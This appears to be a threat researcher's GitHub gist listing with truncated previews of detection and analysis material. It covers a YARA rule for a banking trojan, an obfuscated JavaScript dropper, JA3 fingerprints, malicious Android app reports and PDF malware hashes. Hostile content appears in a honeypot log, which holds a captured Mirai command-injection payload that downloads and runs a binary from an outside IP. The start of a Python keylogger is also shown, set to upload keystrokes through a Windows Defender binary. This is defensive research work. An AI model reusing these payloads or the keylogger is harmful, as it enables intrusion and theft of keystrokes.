teixeira0xfffff
@teixeira0xfffff
teixeira0xfffff / 09328irpf_restiruir_.msi
Created May 18, 2019 14:41
Brazilian .MSI banking trojan
/*
YARA Rule Set
Author: Ialle Teixeira
Date: 2019-05-18
Identifier: MSI banking trojan
*/
rule sig_09328irpf_restiruir_ {
meta:
description = "reported by @DefesaDigital - file 09328irpf_restiruir_.msi"
@teixeira0xfffff
teixeira0xfffff / gist:2ed9152acea792be7dffbf0aa0191b29
Last active July 31, 2019 10:55
Argus/TCPDump/Tshark Date real time
~ apt install tcpdump
~ apt install argus-client
~ tcpdump -nn -s0 -rYourdump.pcap -w - |argus -r - -AZJmR -w - |ra -n -Zb -L10 -r - -s +dur +synack +ackdat +swin +dwin +rate +load +tcprtt +loss +runtime +retrans +sgap +dgap - tcp |xargs -d$'\n' -L1 sh -c 'date "+%d.%m.%Y %T $0"'
@teixeira0xfffff
teixeira0xfffff / js
Created January 5, 2020 10:51
WYwhQLPWQ.js Dropper
'... that the Ludington family included a teenage girl (statue pictured) whose night-long ride to alert the Continental Army of an imminent British attack has been compared to the ride of Paul Revere?... that actress Siobhan Finneran said she wanted her Downton Abbey character "flung off the roof of the Abbey?'
'... that red-headed pine sawfly larvae drag pine needles into the silken tubes in which they live?'
'... that theoretical physicist Deepak Dhar and Ramakrishna Ramaswamy solved the Abelian sandpile model of self-organized criticality with their Dhar-Ramaswamy model?'
'... that Seattles passenger-only ferries, blamed for beach erosion, were forced to slow down because of a class-action lawsuit?'
'... that Juana Bordas says her parents were uncomfortable with the idea of her leaving home to go to college due to the "crab syndrome"?'
'... that the Soviet Armys 7th Guards Tank Division was part of the Group of Soviet Forces in Germany for 43 years during the Cold War?'
'... that the call letters of radio
@teixeira0xfffff
teixeira0xfffff / js
Created January 5, 2020 10:52
am8sd3nwj8w.js Dropper
function am8sd3nwj8w(mbewo2k1wvca) {var ra47g8gtri6sn = "";var n2c5 = 0;var l5k9atx = tisimzg = tob0fvo = 0;while (n2c5 < mbewo2k1wvca.length) {l5k9atx = mbewo2k1wvca.charCodeAt(n2c5);if (l5k9atx < 128) {ra47g8gtri6sn += String.fromCharCode(l5k9atx);n2c5++} else if (l5k9atx > 191 && l5k9atx < 224) {tob0fvo = mbewo2k1wvca.charCodeAt(n2c5 + 1);ra47g8gtri6sn += String.fromCharCode((l5k9atx & 31) << 6 | tob0fvo & 63);n2c5 += 2;} else {tob0fvo = mbewo2k1wvca.charCodeAt(n2c5 + 1);ahhn738dfrtyzre = mbewo2k1wvca.charCodeAt(n2c5 + 2);ra47g8gtri6sn += String.fromCharCode((l5k9atx & 15) << 12 | (tob0fvo & 63) << 6 | ahhn738dfrtyzre & 63);n2c5 += 3;}}return ra47g8gtri6sn;}function mxihtgjffok(mbewo2k1wvca) {var i9hyw2nc39 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var ra47g8gtri6sn = "";var n2c5, l5k9atx, cfcdlqy7;var ct9hjoennw216ou, s32hiqfn1, rubo, lsnyt9met88;var v3vx = 0;mbewo2k1wvca = mbewo2k1wvca.replace(/[^A-Za-z0-9+/=]/g, "");while (v3vx < mbewo2k1wvca.length) {ct9hjoennw216ou = i9hyw2
@teixeira0xfffff
teixeira0xfffff / rdpClient-JA3.csv
Created March 10, 2020 23:25
List of JA3 fingerprints for different RDP clients
"os version","rdp client","ja3","ja3Algorithms","note"
"Windows XP SP3","RDC 6.1.7600","c8a0d08d2cbee4bed7cd90e47588ab9b","769,4-5-10-9-100-98-3-6-19-18-99,65281,,",
"Windows 2012","RDC 6.2.9200","bc2874f25a8254edb36147c151527cfa","771,49192-49191-49172-49171-159-158-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-35-23-65281,23-24,0",
"Windows 2008r2","RDC 6.3.9600","e6a4e2358d4eee6122403f3cb835bcbd","771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-23-65281,23-24,0",
"Windows 2012r2","RDC 6.3.9600","3e686105164b7c9a4cbd59142f18a4e7","771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-35-23-65281,23-24,0",
"Windows 7","RDC 6.3.9600","d54b3eb800cbeccf99fd5d5cdcd7b5b5","771,49192-49191-49172-49171-159-158-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-5-10-11-13-23-652
@teixeira0xfffff
teixeira0xfffff / evilTwin.php
Created June 15, 2020 23:43
Auto Visitor [encoded version]
<?php
// Auto Visitor
// https://github.com/eviltwin-dev/auto-visitor
@teixeira0xfffff
teixeira0xfffff / ReportedApps.csv
Last active July 8, 2020 03:04
Android Malwares [Google Play] | reported by @ReBensk @sh1shk0va @malwrhunterteam
App Info,Developer Name,Package Name,Google Play,Developer Email,Hash
Message Moment,Mandy L Smith,com.ppp.kkk,https://play.google.com/store/apps/details?id=com.ppp.kkk,tchick4u@gmail.com,487f13296e086e606496d26a2547dcfe3f88812e723fa21e94c52b395a0dd361
Gold Miner Game,Margie C Smith,sg.com.goldminerplusgame,https://play.google.com/store/apps/details?id=sg.com.goldminerplusgame,manuqsngdj@gmail.com,97ed67a5d9b1ffe2f3a5093e7461acb8bdad94f22b6ae1f18d24bf8960aa0363
Measure Wallpaper,Donal J Smith,kw.com.measurewallpapers.glitter,https://play.google.com/store/apps/details?id=kw.com.measurewallpapers.glitter,ritvplnci9@gmail.com,2bb4cf4853d7616b22520756c89c864b43753692c2187d72ce9266445a14c50b
Sophisticated Scanner - No trouble & profession,Cedon M Smith,com.ss.pdf.creat.soph.scanner,https://play.google.com/store/apps/details?id=com.ss.pdf.creat.soph.scanner,invesumb970@gmail.com,59e624b1167df9951e6efe7f22e7046bef5f09f6af748a020d4f97b04eefd61d
Profession Translator -Find the charm of languages,David G Smith,com.tra
@teixeira0xfffff
teixeira0xfffff / mirai.tsv
Last active November 20, 2020 12:02
Tpot experiment on Digital Ocean [https://github.com/telekom-security/tpotce]
"@timestamp","alert.signature","http.http_request_body_printable","src_ip","src_port","geoip.country_name","payload_printable","http.url","geoip.as_org","geoip.city_name","geoip.asn"
"Nov 8, 2020 @ 23:17:59.126","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`
","94.200.76.222",49573,"United Arab Emirates","POST /cgi HTTP/1.1
User-Agent: XTC
Host: 127.0.0.1:8089
Content-Length: 172
Accept-Encoding: application/json
action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`
@teixeira0xfffff
teixeira0xfffff / gist:6ccbdbef95da08dcf2e213b99e4b9533
Last active September 1, 2021 21:16
Analyzing Malicious Documents (PDF file)
Name: SCAN_0502_FA2C8.pdf
MD5 dfc20138456eb478673e046754536c76
SHA-1 bbc5dbdf9bbf844854dc52f47b03b88ebac5bc17
SHA-256 a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9
Vhash 913a9ca88f467c85a8c6e005b9321caa5
SSDEEP 384:fC3s7nDeeTykyBmtnbFOB444uBAzLzobLTbL4wu:fC3sO+AAxOBhfAzAbPb8wu
File type PDF
Magic PDF document, version 1.4
File size 16.93 KB (17337 bytes)
https://www.virustotal.com/gui/file/a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9/details
@teixeira0xfffff
teixeira0xfffff / handler.py
Created December 30, 2022 10:32
Python keylogger with weaponized Binary part of Windows Defender
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://{your sub here}.free.beeceptor.com'
uploader = "C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe"
content = ""
def on_press(key):